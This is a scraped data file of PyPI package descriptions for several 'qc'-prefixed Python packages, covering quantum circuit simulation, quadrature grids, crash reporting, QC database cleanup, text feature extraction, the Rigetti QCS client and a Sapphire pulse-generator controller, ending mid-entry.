]]quantumcircuit.rz(qubit: int,theta: float=numpy.pi/2)RZ gate commits a rotation around the z-axis for a qubit.Parameters:qubit (int)- the qubit to have the Rz gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rz(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. +0.j ]]quantumcircuit.ry(qubit: int,theta: float=numpy.pi/2)RY gate commits a rotation around the y-axis for a qubit.Parameters:qubit (int)- the qubit to have the Ry gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around y-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.ry(0)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.rx(qubit: int,theta: float=numpy.pi/2)RX gate commits a rotation around the x-axis for a qubit.Parameters:qubit (int)- the qubit to have the Ry gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around x-axis.Returns:NoneExample:fromqcpyimportquantumCircuitqc=quantumcircuit(2)qc.rx(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. -0.707j]# [0. +0.j ]]quantumcircuit.sx(qubit: int)SX gate is the square root of the Inverse gate (X, PauliX Gate).Parameters:qubit (int)- the qubit to have the Sx gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.sx(0)print(qc.state)# [[0.5+0.5j]# [0. +0.j ]# [0.5-0.5j]# [0. +0.j ]]quantumcircuit.sxdg(qubit: int)SXDG gate is the negative square root of the Inverse gate (X, PauliX Gate) and inverse of the SX gate.Parameters:qubit (int)- the qubit to have the SXdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.sxdg(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. +0.j ]]quantumcircuit.u(qubit: int,theta: float=numpy.pi/2,phi: float=numpy.pi/2,lmbda: float=numpy.pi/2)U gate is given three inputs (theta, phi, and lambda) that allow the inputs to manipulate the base matrix to allow for the position of the enacted qubit around the bloch sphere representation.Parameters:qubit (int)- the qubit to have the U gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.phi (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.lmbda (float)default:numpy.pi/2- angle representation to rotate the qubit's representation.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.u(0)print(qc.state)# [[0.5-0.5j]# [0. +0.j ]# [0.5+0.5j]# [0. +0.j ]]quantumcircuit.custom(qubit: int,custom_matrix: np.array)Will take in a custom single qubit quantum gate and implement it on a qubit.Parameters:qubit (int)- the qubit to have the U gate be applied to the quantum wire.custom_matrix (np.array)- matrix to be applied to the quantum circuit.Returns:NoneExample:fromqcpyimportquantumcircuit,paulixqc=quantumcircuit(2)qc.custom(0,paulix())print(qc.state)# [[0.+0.j]# [0.+0.j]# [1.+0.j]# [0.+0.j]]VisualizerA collection of classes to visualize the quantum circuitclassqcpy.qsphere(circuit)Visualizes the quantum circuit as a q-sphereParameters:circuit- the quantum circuitAttributes:Noneqsphere.make(path: str=\"qsphere.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a Q-Sphere that plots a global visualization of the quantum states in a 3D global viewParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the sphere to be shown instead of saveddarkmode (bool)- pass True for darkmode, false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,qsphereqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)sphere_ex=qsphere(qc)sphere_ex.make(save=False,show=True)classqcpy.bloch(circuit)Visualizes the quantum state of a single qubit as a sphereParameters:circuit- the quantum circuitAttributes:Noneblochsphere.make(show_bit: int=0,path: str=\"qsphere.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a Bloch Sphere that plots the quantum state of a single qubit in a 3D global viewParameters:show_bit (int)- the qubit on the circuit to be visualized, initialized as the 0th bitpath (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the sphere to be shown instead of saveddarkmode (bool)- pass True for darkmode, false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,blochqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)sphere_ex=bloch(qc)sphere_ex.make(show_bit=1,save=False,show=True)classqcpy.statevector(circuit)Visualizes the quantum circuit's quantum amplitutes using a bar graphParameters:circuit- the quantum circuitAttributes:Nonestatevector.make(path: str=\"statevector.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a graph that plots all the amplitudes of the qubits being measuredParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the graph to be shown instead of saveddarkmode (bool)- pass True for darkmode and false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,statevectorqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)statevector(qc).make(save=False,show=True)classqcpy.probability(circuit)Visualizes the quantum circuit's qubits probability of being measured using a bar graphParameters:circuit- the quantum circuitAttributes:Noneprobability.make(path: str=\"probability.png\",save: bool=True,show: bool=True,darkmode: bool=True)Returns a graph that plots all the probabilities of the qubits being measuredParameters:path (str)- name of the image to be savedsave (bool)- pass True for the graph to be savedshow (bool)- pass True for the graph to be shown instead of saveddarkmode (bool)- pass True for darkmode and false for lightmodeReturns:NoneExample:fromqcpyimportquantumcircuit,probabilityqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.h(2)probability(qc).make(save=False,show=True)"} +{"package": "qc-qiskit", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcqp", "pacakge-description": "A CVXPY extension for nonconvex quadratically constrained quadratic programs."} +{"package": "qc-quad", "pacakge-description": "qc-quadQuantum-chemistry quadrature package.This package makes easy to set up so-called Lebedev-Laikov and Gaussian-Legendre grids.\nThese grids are suitable for numerical integration in quantum chemistry applications.Lebedev-Laikov grids provide coordinates and weights for an optimal integration over a surface\nof unit sphere. These grids are Golden standard in quantum chemistry because of their accuracy\nand the minimal number of the integrand-function evaluations.\nThe implementation of the grids is derived from a Matlab implementation by John Burkardthttps://people.sc.fsu.edu/~jburkardt/m_src/sphere_lebedev_rule/sphere_lebedev_rule.htmlGauss-Legendre grids provide coordinates and weights for an optimal integration in one dimension,\nover a finite segment. The Gauss-Legendre grids are suitable for generic functions. This is in\ncontrast to the behavior of wave-functions along radial distance. However, I provide these\ngrids here in order to organize an integration of generic functions over spherical volumes.\nThis integration maintains a nearly constant density of integration points over a ball volume.\nThis integration was useful in computing atomic contributed volumeshttps://www.tandfonline.com/doi/abs/10.1080/00268979100100941in my first-principle toolshttps://first-principle-tools.ew.r.appspot.com.A motivation for composing this package instead of using several packages out there in the\nopen-source community would be \"doing things right\", in a testable, malleable, maintainable,\ncross-platform and parsimonious way.There are several open-source implementations of Lebedev-Laikov grids.\nThe quantum-chemistry package Horton is using a Python binding to a C++\nmodule implementing the gridshttps://github.com/theochem/horton.\nA sub-repositorygridoftheochemrepositories offers the Lebedev-Laikov grids stored\nin.npyfiles. There is an exhaustive set of quadratures in repositoryhttps://github.com/sigma-py/quadpy. However, the code ofquadpyis obfuscated.\nThe repositoryhttps://github.com/Rufflewind/lebedev_laikovprovides the grids via a Python\nbinding to a source code in C language. Similarly,https://github.com/dftlibs/numgridprovides the grids through a binding to a Fortran source.\nThere is a pure Python implementation of Lebedev-Laikov gridshttps://github.com/gabrielelanaro/pyquante/. However, it provides the grids for the first\n11 (6, 14, 26, 38, 50, 74, 86, 110, 146, 170, 194) out of 32 grids implemented by Dmitri Laikov.\nFinally, there is an issue in SciPy with a feature request of Lebedev gridshttps://github.com/scipy/scipy/issues/11929Current packageqc-quadis open source. It provides Lebedev-Laikov grids for 32 grids published by\nDmitri Laikov. It is a pure Python package. This makes this implementation easily testable (pytest),\nextendable and usable.References:Axel Becke, \"A multicenter numerical integration scheme for polyatomic molecules\",\nJournal of Chemical Physics,\nVolume 88, Number 4, 15 February 1988, pages 2547-2553. \n\nVyacheslav Lebedev, Dmitri Laikov, \"A quadrature formula for the sphere of the 131st\nalgebraic order of accuracy\", Russian Academy of Sciences Doklady Mathematics,\nVolume 59, Number 3, 1999, pages 477-481.\n\nLawrence R. Dodd & Doros N. Theodorou, \"Analytical treatment of the volume and surface area\nof molecules formed by an arbitrary collection of unequal spheres intersected by planes\",\nMolecular Physics, 72:6, 1991, pages 1313-1345, DOI: 10.1080/00268979100100941Installationpip install qc-quadDeveloper installationInstallation could be done with poetry = \"^1.3.1\"poetry installUsageThis is a part of some quantum-chemistry software. Some use cases can be seen in the tests.RoadmapLet's see what does the community thinks, but here are two points worth nothing.Note, that to become truly quantum-chemical quadrature this package needs a smooth separation\nof space which depends on the geometry of the molecule. Please, see works by Axel Becke and\nonwards. Perhaps, a one-dimensional grid suitable for integrating exponentially decaying functions,\ntogether with a pruning scheme for Lebedev-Laikov grids would be suitable in this package.\nThis should be easy to bolt in later for somebody who needs it.The major difficulty in setting up of the Lebedev-Laikov grids is the absence of their\ndefinition for a given number of points. The grids are provided for minimum of 6 and maximum\nof 5810 points: 6, 14, 26, 38, 50, 74, 86, 110, 146, 170, 194, 230, 266, 302, 350, 434, 590,\n770, 974, 1202, 1454, 1730, 2030, 2354, 2702, 3074, 3470, 3890, 4334, 4802, 5294 and 5810,\n32 grids in total. Each of the 32 grids, is composed of a set of 6 kinds of grids composed\nof 6, 12, 8, 24, 24 and 48 points. To the best of my knowledge, no implementation out in\nthe open-source offers any generalizations. For example, a construction of grids with more\npoints by attaching the 48-point grids together or construction of a 36-point grid by using\nthree of the 12-point grids is not implemented although this should be feasible.ContributingPEP8 code formatting is mandatory.The bug fixes are welcome.Small improvements are welcome.Definition of the hard-coded coefficients is especially welcome.Authors and acknowledgmentJames Talmanhttps://www.sciencedirect.com/science/article/abs/pii/0010465583901261drew my attention to Lebedev-Laikov grids.LicenseMIT license: no guarantee, free to use anywhere.Project statusInitial release is done."} +{"package": "qcrandom", "pacakge-description": "qcrandomOverviewqcrandom is a python library which provides easy way to generate random numbers on quantum computers. Quantum computers allow us to generate truly random numbers.SetupSetup instructions are avaliablehere.LearnCheck out ourWiki page!Any problems?If you find a bug, feel free to post anissue!"} +{"package": "qcrash", "pacakge-description": "AboutA PyQt/PySide framework for reporting application crash (unhandled exception)\nand/or let the user report an issue/feature request.Featuresmultiple builtin backends for reporting bugs:github_backend: let you create issues on githubemail_backend: let you send an email with the crash report.highly configurable, you can create your own backend, set your own formatter,\u2026a thread safe exception hook mechanism with a way to setup your own functionScreenshotsScreenshots taken on KDE Plasma 5Report dialogReview report before submittingGithub integrationLICENSEQCrash is licensed under the MIT license.Installationpip install qcrashUsageBasic usage:importqcrash.apiasqcrash# setup our own function to collect system info and application logqcrash.get_application_log=my_app.get_application_logqcrash.get_system_information=my_app.get_system_info# configure backendsgithub=qcrash.backends.GithubBackend('ColinDuquesnoy','QCrash')email=qcrash.backends.EmailBackend('colin.duquesnoy@gmail.com')qcrash.install_backend([github,email])# install exception hookqcrash.install_except_hook()# or show the report dialog manuallyqcrash.show_report_dialog()Some more detailedexamplesare available. Also have a look at theAPI documentation.Dependencieskeyringgithubpy(embedded into the package)TestingTo run the tests, just run the following command:python setup.py test"} +{"package": "qc-remote", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcrepocleaner", "pacakge-description": "Here are the tools to clean up the CCDB of the QC.Entry pointIt iso2-qc-repo-cleaner. See the long comment at the beginning.Usageusage: o2-qc-repo-cleaner [-h] [--config CONFIG] [--config-git] [--config-consul CONFIG_CONSUL] [--log-level LOG_LEVEL] \n [--dry-run] [--only-path ONLY_PATH] [--workers WORKERS]ConfigurationThe fileconfig.yamlcontains the CCDB URL and the rules to be followed to clean up the database. An example is provided along this README (config.yaml).\nA typical rule in the config file looks like:- object_path: qc/ITS/.*\n delay: 240\n policy: 1_per_hourThere can be any number of these rules. The order is important as we use the first matching rule for each element in the QCDB (caveat the use of the flagcontinue_with_next_rule, see below).object_path: a pattern to be matched to know if the rule appliesdelay: the duration in minutes of the grace period during which an object is not removed, even if it matches the above path.policy: the name of a policy to apply on the matching objects. Here are the currently available policies (full description in the corresponding files):1_per_hour: keep the first and extend its validity to 1 hour, remove everything in the next hour, repeat.1_per_run: requires the \"Run\" or \"RunNumber\" metadata to be set. Keep only the most recent version of an object for a given run.last_only: keep only the last version, remove everything else.none_kept: keep none, remove everythingskip: keep everythingfrom_timestamp: the rule only applies to versions whosevalid_fromis older than this timestampto_timestamp: the rule only applies to versions whosevalid_fromis younger than this timestampcontinue_with_next_rule: ifTrue, the next matching rule is also applied.xyz: any extra argument necessary for a given policy. This is the case of the argumentdelete_when_no_runrequired by the policy1_per_run.The configuration for ccdb-test is describedhere.Unit Testscd QualityControl/Framework/script/RepoCleaner ; python3 -m unittest discoverand to test only one of them:python3 -m unittest tests/test_NewProduction.py -k test_2_runsIn particular there is a test for theproductionrule that is pretty extensive. It hits the ccdb though and it needs the following path to be truncated:qc/TST/MO/repo/test*Other testsMost of the classes and Rules have a main to help test them. To run do e.g.python3 1_per_run.py.InstallationCMake will install the python scripts in bin and the config file in etc.ExamplePYTHONPATH=./rules:$PYTHONPATH ./o2-qc-repo-cleaner --dry-run --config config-test.yaml --dry-run --only-path qc/DAQ --log-level 10DevelopmentTo install locallycd Framework/script/RepoCleaner\npython3 -m pip install .Upload new versionPrerequisiteCreate an account onhttps://pypi.orgCreate new versionUpdate version number insetup.pypython3 setup.py sdist bdist_wheelpython3 -m twine upload --repository pypi dist/*"} +{"package": "qcri", "pacakge-description": "UNKNOWN"} +{"package": "qcri-cyber-commons", "pacakge-description": "No description available on PyPI."} +{"package": "qcrit", "pacakge-description": "Easily extract features from texts, and run machine learning algorithms on them. Write your own features, use ours, or do both!https://www.qcrit.orgInstallationWithpip:pipinstallqcritWithpipenvpipenvinstallqcritAboutThe qcrit package contains utilities to facilitate processing and analyzing literature.To try extracting some features, just replace'your-directory-name'with the name of a directory of.txtfiles. Everything else is taken care of!fromqcrit.extract_featuresimportmainfromqcrit.textual_featureimportsetup_tokenizersimportqcrit.features.universal_featuressetup_tokenizers(terminal_punctuation=('.','!','?'))main(corpus_dir='your-directory-name',file_extension_to_parse_function={'txt':lambdafilename:open(filename).read()})Writing Your Own FeaturesA feature is a number that results from processing literature. An example of a feature might be the number of definite articles, the mean sentence length, or the fraction of interrogative sentences. The word \"feature\" can also refer to a python function that computes such a value.Normally to compute features, you must 1) obtain a corpus of texts, 2) traverse each text in the corpus, 3) parse the text into tokens, 4) write logic to calculate features, and 5) output the results to the console or to a file. Also, this will run slowly unless you 6) cache tokenized text for features that use the same tokens.With thetextual_featuredecorator, steps (2), (3), (5), and (6) are abstracted away - you just need (1) to supply the corpus.Once you have written a feature as apythonfunction, label it with the decoratortextual_feature. Your feature must have exactly one parameter which is assumed to be the parsed text of a file.fromqcrit.textual_featureimporttextual_feature@textual_feature()defcount_definite_article(text):returntext.count('the')Thetextual_featuredecorator takes an argument that represents the type of tokenization.There are four supported tokenization_types:'sentences','words','sentence_words'andNone. This tells the function in\nwhat format it will receive the'text'parameter.IfNone, the function will receive the text parameter as a string.If'sentences', the function will receive the text parameter as a list of sentences, each as a stringIf'words', the function will receive the text parameter as a list of wordsIf'sentence_words', the function will recieve the text parameter as a list of sentences, each as a list of wordsfromfunctoolsimportreduce@textual_feature(tokenize_type='sentences')defmean_sentence_len(text):sen_len=reduce(lambdacur_len,cur_sen:cur_len+len(cur_sen),text,0)num_sentences=len(text)returnsen_len/num_sentencesExtracting FeaturesUseqcrit.extract_features.mainto run all the functions labeled with the@textual_featuredecorator and output results into a file.corpus_dir- the directory to search for files containing texts, this will traverse all sub-directories as wellfile_extension_to_parse_function- map from file extension (e.g. 'txt', 'tess') of texts that you would like to parse to a function directing how to parse itoutput_file- the file to output the results into, created to be analyzed during machine learning phaseIn order for sentence tokenization to work correctly,setup_tokenizers()must be called with the\nterminal punctuation marks of the language being analyzed. You can also optionally supply the name of the language as well. If data exists about how to parse the language, this may improve sentence tokenization.fromqcrit.extract_featuresimportmain,parse_tessfromqcrit.textual_featureimportsetup_tokenizersfromsomewhere_elseimportcount_definite_article,mean_sentence_lensetup_tokenizers(terminal_punctuation=('.','!','?'),language='greek')main(corpus_dir='demo',file_extension_to_parse_function={'tess':parse_tess},output_file='output.pickle')Output:Extractingfeaturesfrom.tessfilesindemo/100%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588|4/4[00:00<00:00,8.67it/s]Featureminingcomplete.Attemptingtowritefeatureresultsto\"output.pickle\"...\nSuccess!\n\n\nFeatureminingelapsedtime:1.4919secondsAnalysisUse the@model_analyzer()decorator to label functions that analyze machine learning modelsInvokeanalyze_models.main('output.pickle', 'classifications.csv')to\nrun all functions labeled with the@model_analyzer()decorator. To run only one function, include\nthe name of the function as the third parameter to analyze_models.main()output.pickle: Now that the features have been extracted and output into output.pickle, we\ncan use machine learning models on them.classifications.csv: The file classifications.csv contains the name of the file in the first column\nand the particular classification (prose or verse) in the second column for every file in the corpus.importqcrit.analyze_modelsfromqcrit.model_analyzerimportmodel_analyzerfromsklearnimportensemblefromsklearn.model_selectionimporttrain_test_splitfromsklearn.metricsimportaccuracy_score@model_analyzer()deffeature_rankings(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier feature rankings\\n')features_train,features_test,labels_train,_=train_test_split(data,target,test_size=0.5,random_state=0)clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)clf.predict(features_test)#Display features in order of importanceprint('Feature importances:')fortupinsorted(zip(feature_names,clf.feature_importances_),key=lambdas:-s[1]):print('\\t%f:%s'%(tup[1],tup[0]))@model_analyzer()defclassifier_accuracy(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier accuracy\\n')features_train,features_test,labels_train,labels_test=train_test_split(data,target,test_size=0.5,random_state=0)clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)results=clf.predict(features_test)print('Stats:')print('\\tNumber correct: '+str(accuracy_score(labels_test,results,normalize=False))+' / '+str(len(results)))print('\\tPercentage correct: '+str(accuracy_score(labels_test,results)*100)+'%')@model_analyzer()defmisclassified_texts(data,target,file_names,feature_names,labels_key):print('-'*40+'\\nRandom Forest Classifier misclassified texts\\n')features_train,features_test,labels_train,labels_test,idx_train,idx_test=train_test_split(data,target,range(len(target)),test_size=0.5,random_state=0)print('Train texts:\\n\\t'+'\\n\\t'.join(file_names[i]foriinidx_train)+'\\n')print('Test texts:\\n\\t'+'\\n\\t'.join(file_names[i]foriinidx_test)+'\\n')clf=ensemble.RandomForestClassifier(random_state=0,n_estimators=10)clf.fit(features_train,labels_train)results=clf.predict(features_test)print('Misclassifications:')fori,_inenumerate(results):ifresults[i]!=labels_test[i]:print('\\t'+file_names[idx_test[i]])qcrit.analyze_models.main('output.pickle','classifications.csv')Output:----------------------------------------\nRandom Forest Classifier feature rankings\n\nFeature importances:\n\t0.400000: num_conjunctions\n\t0.400000: num_interrogatives\n\t0.200000: mean_sentence_length\n\n\nElapsed time: 0.0122 seconds\n\n----------------------------------------\nRandom Forest Classifier accuracy\n\nStats:\n\tNumber correct: 1 / 2\n\tPercentage correct: 50.0%\n\n\nElapsed time: 0.0085 seconds\n\n----------------------------------------\nRandom Forest Classifier misclassified texts\n\nTrain texts:\n\tdemo/aristotle.poetics.tess\n\tdemo/aristophanes.ecclesiazusae.tess\n\nTest texts:\n\tdemo/euripides.heracles.tess\n\tdemo/plato.respublica.part.1.tess\n\nMisclassifications:\n\tdemo/plato.respublica.part.1.tess\n\n\nElapsed time: 0.0082 secondsDevelopmentEnsure that you havepipenvinstalled. Also, ensure that you have a version ofpythoninstalled that matches the version in thePipfile.Setup a virtual environment and install the necessary dependencies:PIPENV_VENV_IN_PROJECT=truepipenvinstall--devActivate the virtual environment:pipenvshellNow,pythoncommands will use the dependencies andpythonversion from the virtual environment. Useexitto leave the virtual environment, and usepipenv shellwhile in the project directory to activate it again.Demopythondemo/demo.pySubmissionThe following commands will submit the package to thePython Package Index. Before running them, it may be necessary to increment the version number in__init__.pyand to delete any previously generateddist/,build/, andegg-infodirectories if they exist.pythonsetup.pybdist_wheelsdist\ntwineuploaddist/*"} +{"package": "qcrop", "pacakge-description": "QCropA basic PyQt image cropping tool.Installpip install qcropUsageAs an applicationStart with the command:qcrop path/to/image.extThe supported image formats arethose handled by the Qt framework: BMP, GIF, JPG, PNG, PBM, PGM, PPM, XBM and XPM.As a python moduleSample code:fromPyQt5.QtGuiimportQPixmapfromqcrop.uiimportQCroporiginal_image=QPixmap(...)crop_tool=QCrop(original_image)status=crop_tool.exec()ifstatus==Qt.Accepted:cropped_image=crop_tool.image# else crop_tool.image == original_imageUser interfaceUse the mouse to select the image area to crop. You can also use the X, Y, Width and Height fields to precisely adjust the area (you can use mouse wheel hovering the field).Click the reset button to set the crop area to the full image.Once done click ok to validate the crop, cancel to go back to the original image."} +{"package": "qcs", "pacakge-description": "pyQuilA library for easily generating Quil programs to be executed using the Rigetti Forest platform.\npyQuil is licensed under theApache 2.0 license.DocumentationDocumentation is hosted athttp://pyquil.readthedocs.io/en/latest/InstallationYou can install pyQuil as a conda package (recommended):condainstall-crigettipyquilor usingpip:pip install pyquilTo instead install pyQuil from source, clone this repository,cdinto it, and run:pip install -e .Connecting to Rigetti ForestpyQuil can be used to build and manipulate Quil programs without restriction. However, to run\nprograms (e.g., to get wavefunctions, get multishot experiment data), you will need an API key\nforRigetti Forest. This will allow you to run your programs on the\nRigetti Quantum Virtual Machine (QVM) or on a real quantum processor (QPU).Once you have your key, run the following command to automatically set up your config:pyquil-config-setupYou can also create the configuration file manually if you'd like and place it at~/.pyquil_config.\nThe configuration file is in INI format and should contain all the information required to connect to Forest:[Rigetti Forest]\nkey: \nuser_id: You can change the location of this file by setting thePYQUIL_CONFIGenvironment variable.If you encounter errors or warnings trying to connect to Forest then see the fullGetting Started GuideExamples using the Rigetti QVMHere is how to construct a Bell state program and how to compute the amplitudes of its wavefunction:>>>frompyquil.quilimportProgram>>>frompyquil.apiimportQVMConnection>>>frompyquil.gatesimport*>>>qvm=QVMConnection()>>>p=Program(H(0),CNOT(0,1))>>>qvm.wavefunction(p).amplitudesarray([0.7071067811865475+0j,0j,0j,0.7071067811865475+0j])How to do a simulated multishot experiment measuring qubits 0 and 1 of a Bell state. (Of course,\neach measurement pair will be00or11.)>>>frompyquil.quilimportProgram>>>frompyquil.apiimportQVMConnection>>>frompyquil.gatesimport*>>>qvm=QVMConnection()>>>p=Program()>>>p.inst(H(0),...CNOT(0,1),...MEASURE(0,0),...MEASURE(1,1))>>>print(p)H0CNOT01MEASURE0[0]MEASURE1[1]>>>qvm.run(p,[0,1],10)[[0,0],[1,1],[1,1],[0,0],[0,0],[1,1],[0,0],[0,0],[0,0],[0,0]]CommunityJoin the public Forest Slack channel athttp://slack.rigetti.com.The following projects have been contributed by community members:Syntax Highlighting for Quilcontributed byJames WeaverWeb Based Circuit Simulatorcontributed byRavisankar A VQuil in Javascriptcontributed byNick DoironQuil in Javacontributed byVictory OmoleDeveloping PyQuilTo make changes to PyQuil itself seeDEVELOPMENT.mdfor instructions on development and testing.How to cite pyQuil and ForestIf you use pyQuil, Grove, or other parts of the Rigetti Forest stack in your research, please cite it as follows:BibTeX:@misc{1608.03355,\n title={A Practical Quantum Instruction Set Architecture},\n author={Smith, Robert S and Curtis, Michael J and Zeng, William J},\n journal={arXiv preprint arXiv:1608.03355},\n year={2016}\n}Text:R. Smith, M. J. Curtis and W. J. Zeng, \"A Practical Quantum Instruction Set Architecture,\" (2016), \n arXiv:1608.03355 [quant-ph], https://arxiv.org/abs/1608.03355"} +{"package": "qcs-api-client", "pacakge-description": "QCS API ClientA client library for accessing theRigetti QCS API.UsageSynchronous Usagefromqcs_api_client.clientimportbuild_sync_clientfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.syncimportlist_reservationswithbuild_sync_client()asclient:response:ListReservationsResponse=list_reservations(client=client).parsedAsynchronous Usagefromqcs_api_client.clientimportbuild_async_clientfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.asyncioimportlist_reservations# Within an event loop:asyncwithbuild_async_client()asclient:response:ListReservationsResponse=awaitlist_reservations(client=client).parsedConfigurationBy default, initializing your client withbuild_sync_clientorbuild_async_clientwill\nuseQCSClientConfiguation.loadto load default configuration values. This function accepts:A profile name (env:QCS_PROFILE_NAME). The name of the profile referenced in your settings\nfile. If not provided,QCSClientConfiguation.loadwill evaluate this to adefault_profile_nameset in your settings file or \"default\".A settings file path (env:QCS_SETTINGS_FILE_PATH). A path to the current user's settings file in TOML format. If not provided,QCSClientConfiguation.loadwill evaluate this to~/.qcs/settings.toml.A secrets file path (env:QCS_SECRETS_FILE_PATH). A path to the current user's secrets file in TOML format. If not provided,QCSClientConfiguation.loadwill evaluate this to~/.qcs/secrets.toml. The user should have write access to this file, as the client will attempt to update the file with refreshed access tokens as necessary.If you need to specify a custom profile name or path you can initialize your client accordingly:fromqcs_api_client.clientimportbuild_sync_client,QCSClientConfigurationfromqcs_api_client.modelsimportListReservationsResponsefromqcs_api_client.operations.syncimportlist_reservationsconfiguration=QCSClientConfiguration.load(profile_name='custom',secrets_file_path='./path/to/custom/secrets.toml',settings_file_path='./path/to/custom/settings.toml',)withbuild_sync_client(configuration=configuration)asclient:response:ListReservationsResponse=list_reservations(client=client).parsedDevelopmentThe source code for this repository is synchronized from another source. No commits made directly to GitHub will be retained."} +{"package": "qcsapphire", "pacakge-description": "Quantum Composer Sapphire 9200 Pulser ControlHelper code to communicate withQuantum Composer's\nSapphire 9200 TTL pulse generator.This code facilitates connections to the device, communication, error handling and system status.Installationpip install qcsapphireUsageDetermine the portimportqcsapphireqcsapphire.discover_devices()Will return a list of ports and information about devices connected to those ports.\nFor example, on *nix platforms, you may see[['/dev/cu.BLTH','n/a','n/a'],['/dev/cu.Bluetooth-Incoming-Port','n/a','n/a'],['/dev/cu.usbmodem141101','QC-Pulse Generator','USB VID:PID=04D8:000A LOCATION=20-1.1']]The device here is connected to\\dev\\cu.usbmodem141101.On Windows you may see[['COM3','Intel(R) Active Management Technology - SOL (COM3)','PCI\\\\VEN_8086&DEV_43E3&SUBSYS_0A541028&REV_11\\\\3&11583659&1&B3'],['COM5','USB Serial Device (COM5)','USB VID:PID=0483:A3E5 SER=206A36705430 LOCATION=1-2:x.0'],['COM6','USB Serial Device (COM6)','USB VID:PID=04D8:000A SER= LOCATION=1-8:x.0'],['COM7','USB Serial Device (COM7)','USB VID:PID=239A:8014 SER=3B0D07C25831555020312E341A3214FF LOCATION=1-6:x.0']]It is certainly not obvious to which USB port the QC Sapphire is connected. However,\nusing the Windows Task Manager, as well as trial and error, should eventually\nreveal the correct serial port to use. In this case,COM6.Connection to Pulserpulser=qcsapphire.Pulser('COM6')CommunicationFor normal usage, all commands sent to the device should use thequery()method or\nwith property-like calls (see section below).Thequery()method will write a command, read the response from the device,\ncheck for errors (raising an Exception when an error is found) and return the string\nresponse. For example,ret_val=pulser.query(':PULSE0:STATE?')print(ret_val)'0'ret_val=pulser.query(':PULSE1:WIDTH 0.000025')print(ret_val)'ok'ret_val=pulser.query(':PULSE1:WIDTH?')print(ret_val)'0.000025000'Property-Like CallsIt's possible to make the same calls to the pulser using a property-like call.\nInstead of callingpulser.query(\"command1:subcommand:subsubcommand value\"),\none can callpulser.command1.subcommand.subsubcommand(value), which is more readable.For example,ret_val=pulser.pulse1.width(0.000025)#sets the width of channel Aprint(ret_val)# 'ok'width=pulser.pulse1.width()#asks for the width of channel Aprint(width)# '0.000025000'All of the SCPI commands can be built this way.In either case, the user is responsible\nfor sending the correct command strings by followingthe API.\nIt should be pointed out there is no need to worry about string encoding and carriage returns / line feeds,\nas that is taken care of by the code.Programming ChannelsInstead of using 'pulseN' to access a particular QCSapphire channel, methods have\nbeen added to facilitate more programmatic ways of control.Global and Channel StatesTwo methods exist to report on global and channel settingsGlobal Settingsimportpprintpp=pprint.PrettyPrinter(indent=4)pp.pprint(pulser.report_global_settings())Channel Settingsforchannelinrange(1,5):pp.pprint(f'channel{channel}')pp.pprint(pulser.report_channel_settings(channel))ExamplesThe following examples demonstrate both simple and advanced usage.ResetsThe QCSapphire can be unstable at times. We have found that forcing the\nsystem to reset, multiple times, is necessary to program the pulser the\nthe ways described below. You may or may-not have better stability\nif you reset the pulser before programming.foriinrange(2):pulser.set_all_state_off()time.sleep(1)pulser.query('*RST')pulser.system.mode('normal')CWODMRIn CWODMR our spin system is continuously illuminated with an optical pump,\nwhile an oscillating (RF) magnetic field drives magnetic transitions between\nspin states. While the optical pump is continuously on, we can use the QCSapphire\nto control the RF magnetic signal timing. The RF signal hardware will control\nthe frequency of the field (for NV centers, between 2.6 and 3.2 GHz, depending on\nthe level of Zeeman splitting). The QCSapphire's TTL output may operate a\nswitch that blocks the RF signal at known times. This allows the experimenter\nto acquire photo luminescence (PL) signal for periods when no RF signal is applied\nin order to measure a background, and to then measure PL when the RF is applied.In this case, we wish to program the QCSapphire to output a TTL signal of fixed\nduration and period. The following example shows how to generate a 5 microsecond on/off TTL signal.Simple 